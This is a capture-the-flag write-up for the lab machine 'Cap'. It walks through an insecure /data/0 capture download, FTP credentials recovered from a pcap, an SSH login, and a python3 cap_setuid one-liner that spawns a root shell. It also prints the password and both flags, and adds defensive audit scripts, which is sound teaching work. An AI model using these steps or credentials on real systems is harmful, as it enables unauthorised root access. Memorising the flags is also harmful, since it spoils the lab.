Cap

TARGET IP: 10.10.10.245
HOST IP: 10.10.16.3
RECON
WEBSITE
http://[TARGET IP]

Looks like a data analytics page that I am currently signed into as Nathan. The dropdown menu under the user doesn't do anything. All of the buttons, including Logout, don't point anywhere or do anything. Take a look at the source code:
<!-- offset area start -->
<div class="offset-area">
<div class="offset-close"><i class="ti-close"></i></div>
<ul class="nav offset-menu-tab">
<li><a class="active" data-toggle="tab" href="#activity">Activity</a></li>
<li><a data-toggle="tab" href="#settings">Settings</a></li>
</ul>
<div id="activity" class="tab-pane fade in show active">
<div class="recent-activity">
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-check"></i>
</div>
<div class="tm-title">
<h4>Added</h4>
<span class="time"><i class="ti-time"></i>7 Minutes Ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>You missed you Password!</h4>
<span class="time"><i class="ti-time"></i>09:20 Am</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Member waiting for you Attention</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>You Added Kaji Patha few minutes ago</h4>
<span class="time"><i class="ti-time"></i>01 minutes ago</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg1">
<i class="fa fa-envelope"></i>
</div>
<div class="tm-title">
<h4>Ratul Hamba sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Hello sir , where are you, i am egerly waiting for you.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg2">
<i class="fa fa-exclamation-triangle"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="fa fa-bomb"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
<div class="timeline-task">
<div class="icon bg3">
<i class="ti-signal"></i>
</div>
<div class="tm-title">
<h4>Rashed sent you an email</h4>
<span class="time"><i class="ti-time"></i>09:35</span>
</div>
<p>Lorem ipsum dolor sit amet consectetur adipisicing elit. Esse distinctio itaque at.
</p>
</div>
</div>
</div>
<div id="settings" class="tab-pane fade">
<div class="offset-settings">
<h4>General Settings</h4>
<div class="settings-list">
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch1" />
<label for="switch1">Toggle</label>
</div>
</div>
<p>Keep it 'On' When you want to get all the notification.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show recent activity</h5>
<div class="s-swtich">
<input type="checkbox" id="switch2" />
<label for="switch2">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show your emails</h5>
<div class="s-swtich">
<input type="checkbox" id="switch3" />
<label for="switch3">Toggle</label>
</div>
</div>
<p>Show email so that easily find you.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Show Task statistics</h5>
<div class="s-swtich">
<input type="checkbox" id="switch4" />
<label for="switch4">Toggle</label>
</div>
</div>
<p>The for attribute is necessary to bind our custom checkbox with the input.</p>
</div>
<div class="s-settings">
<div class="s-sw-title">
<h5>Notifications</h5>
<div class="s-swtich">
<input type="checkbox" id="switch5" />
<label for="switch5">Toggle</label>
</div>
</div>
<p>Use checkboxes when looking for yes or no answers.</p>
</div>
</div>
</div>
</div>
</div>
</div>
There is a lot there, but it looks like we have some new information: we have a user named Nathan and possibly other users Rashed, Kaji Patha, and Ratul Hamba.
Checking with curl doesn't give us the version number of the gunicorn web server.
curl [TARGET IP] -sI

If we go to the home tab in the upper right and click on Network Status, we get some really good info about the machine without actually having to run an NMAP scan. Looks like ports 21, 22, and 80 are open.

When I try something in the search bar, nothing pops up but a parameter is added to the URL.
http://[TARGET IP]/?search=[SEARCHED WORD]#
I captured a packet with Burp Suite and received the following.

Let's try the Security Snapshot button. This appears to grab some packet data over a 5 second period and create a pcap file to look at. We can also see that the URL shows a data parameter that equals 1 after first use and goes up sequentially. Let's set the parameter to 0 and see what it spits out. We'll also grab the pcap file from it.
http://[TARGET IP]/data/0
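The sequential data parameter with no ownership check is the flaw this step relies on. As an added illustration (not Cap's real application code), here is a hypothetical stand-in for the /data/<id> route, the vulnerable version beside a hardened one; the CAPTURES table and user names are constructed sample data.

```python
# Hypothetical model of the /data/<id> capture-download route; constructed sample data.
# Maps capture id -> owning username.
CAPTURES = {0: "admin", 1: "nathan", 2: "nathan", 3: "rashed"}


def vulnerable_get_capture(capture_id, session_user):
    """Serves any capture that exists. The logged-in user is never consulted, so
    decrementing the sequential id to 0 returns someone else's capture."""
    return 200 if capture_id in CAPTURES else 404


def hardened_get_capture(capture_id, session_user):
    """Requires a session and ownership. 'Does not exist' and 'not yours' both map
    to 404 so an enumerating client cannot learn which ids exist."""
    if session_user is None:
        return 401
    if CAPTURES.get(capture_id) != session_user:
        return 404
    return 200


def reachable_ids(handler, session_user, ids=range(0, 5)):
    """Ids a given client can download by walking the id space; used to compare handlers."""
    return [i for i in ids if handler(i, session_user) == 200]


if __name__ == "__main__":
    print("vulnerable:", reachable_ids(vulnerable_get_capture, "nathan"))
    print("hardened:  ", reachable_ids(hardened_get_capture, "nathan"))
```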

We can open this pcap file in Wireshark to take a look at it and see if we can find any good information.

WIRESHARK
Scanning through the Wireshark capture, we quickly find FTP credentials for the user Nathan.
nathan:Buck3tH4TF0RM3!
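What Wireshark shows here is an FTP login crossing the wire in cleartext. As an added example (not from the original writeup), the following minimal pcap reader walks a capture and flags every USER/PASS pair sent to port 21, keeping the username for the report but never copying the password out; the sample capture, addresses and dummy password are constructed inline, and only little-endian pcap with Ethernet frames is handled.

```python
import struct

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"   # libpcap magic, little-endian, microsecond timestamps


def _tcp_payload(frame):
    """Return (dst_port, payload) for an Ethernet/IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    tcp = 14 + (frame[14] & 0x0F) * 4                      # Ethernet + IPv4 header (IHL)
    dst_port = struct.unpack("!H", frame[tcp + 2:tcp + 4])[0]
    return dst_port, frame[tcp + (frame[tcp + 12] >> 4) * 4:]


def find_cleartext_ftp_logins(pcap):
    """Report FTP logins sent in the clear: username kept, password only flagged."""
    if pcap[:4] != PCAP_MAGIC_LE:
        raise ValueError("this example only reads little-endian pcap files")
    findings, pending_user, off = [], None, 24            # 24-byte global header
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        parsed = _tcp_payload(frame)
        if parsed is None or parsed[0] != 21:              # client -> server control channel only
            continue
        for line in parsed[1].split(b"\r\n"):
            if line[:5].upper() == b"USER ":
                pending_user = line[5:].decode(errors="replace")
            elif line[:5].upper() == b"PASS " and pending_user:
                findings.append({"user": pending_user, "password_seen": True})
                pending_user = None
    return findings


def _frame(payload, src=(10, 10, 16, 3), dst=(10, 10, 10, 245)):
    """Constructed Ethernet/IPv4/TCP frame to port 21 (checksums left zero; the reader ignores them)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0, bytes(src), bytes(dst))
    tcp = struct.pack("!HHIIBBHHH", 40000, 21, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap():
    """Constructed capture with one USER and one PASS command (dummy password, not a real one)."""
    out = PCAP_MAGIC_LE + struct.pack("<HHiIII", 2, 4, 0, 0, 65535, 1)   # v2.4, LINKTYPE_ETHERNET
    for payload in (b"USER nathan\r\n", b"PASS dummy-password\r\n"):
        frame = _frame(payload)
        out += struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    print(find_cleartext_ftp_logins(build_sample_pcap()))
```

Run it against a real capture with `find_cleartext_ftp_logins(open("snapshot.pcap", "rb").read())`; a non-empty result means a service on the network is still accepting passwords over plain FTP.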
We can now log into nathan's account, list out the current working directory, and download the user flag.
ftp [TARGET IP]
nathan
Buck3tH4TF0RM3!
ls -la
get user.txt
On our host system we can then look into the text file for the first flag.
cat user.txt
user.txt: 1f896817980ce9dfee4c79c1922c5ae3
WAPPALYZER

The backend Language appears to be Python
Utilizes Gunicorn as a webserver
The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.
NMAP
nmap [TARGET IP]

nmap -A -sV -p 21,22,80 [TARGET IP]

sudo nmap [TARGET IP] -sS -sV --script http-headers -p 80

ENUMERATION
GOBUSTER
SUBDOMAIN
gobuster dir -u http://[TARGET IP] -w /usr/share/dirb/wordlists/common.txt

None of these are new to me, and they don't provide any new information.
gobuster vhost -u http://[TARGET IP]/ -w /usr/share/dirb/wordlists/common.txt

TARGET ENUMERATION
Now that we have credentials for nathan, we can spend some time exploring the target system for possible privilege escalation. I'm going to use the credentials to log in through SSH.
ssh nathan@[TARGET IP]
yes
Buck3tH4TF0RM3!

Try checking out what sudo privileges we have.
sudo -l
Buck3tH4TF0RM3!

Unfortunately, we have none, so let's go digging around.
I spent some time digging around myself but didn't find anything. I decided to upload a copy of linpeas to the target account and perform some auto enumeration to help out.
I came across something interesting.

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
I can verify the file capabilities with the following command. Capabilities grant a binary specific root-level privileges without making it fully SUID; cap_setuid in particular lets the process change its own UID. Similar to SUID.
getcap -r / 2>/dev/null
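From the defender's side, the getcap output above is exactly what a periodic audit should be parsing. As an added example (not part of the original writeup), this script reads getcap -r output, flags binaries whose permitted or effective set contains an identity-changing capability, notes when the binary is a scripting interpreter, and produces the setcap command that keeps only the harmless capability. The DANGEROUS list is my own selection and the sample output is constructed around the line found on this box.

```python
import re

# Capabilities that let a process change identity or bypass file permissions; a binary holding
# one of these in its permitted or effective set hands root to anyone allowed to execute it.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner"}
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua)[0-9.]*$")


def parse_getcap_line(line):
    """Parse one getcap -r line; accepts 'path = caps+flags' and the newer 'path caps=flags' form."""
    line = line.strip()
    path, spec = line.split(" = ", 1) if " = " in line else line.rsplit(None, 1)
    caps = set()
    for clause in spec.split():
        m = re.fullmatch(r"([a-z0-9_,]+)[+=]([eip]+)", clause)
        if m and set("ep") & set(m.group(2)):       # inheritable-only caps are not live; skip
            caps.update(m.group(1).split(","))
    return path, caps


def audit_capabilities(getcap_output):
    """One finding per binary holding a dangerous capability, with the setcap command that fixes it."""
    findings = []
    for line in getcap_output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        risky = caps & DANGEROUS
        if not risky:
            continue
        keep = sorted(caps - DANGEROUS)
        # Keep capabilities the binary may genuinely need (here cap_net_bind_service), drop the rest.
        fix = f"setcap {','.join(keep)}+ep {path}" if keep else f"setcap -r {path}"
        findings.append({"path": path, "caps": sorted(risky),
                         "interpreter": bool(INTERPRETER.search(path)), "fix": fix})
    return findings


# Constructed sample of getcap -r output, including the line seen on this box.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
"""

if __name__ == "__main__":
    for finding in audit_capabilities(SAMPLE_GETCAP):
        print(finding)
```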

This is great information, as having cap_setuid set is a particularly vulnerable situation. HackTricks and GTFOBins both have sections on exploiting this for privilege escalation. Let's go with the privilege escalation from GTFOBins.
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
And now I have root privileges.
Let's go get the root flag.
cat /root/root.txt
ca9be49e3fbed8b6be99a27bcd9be60f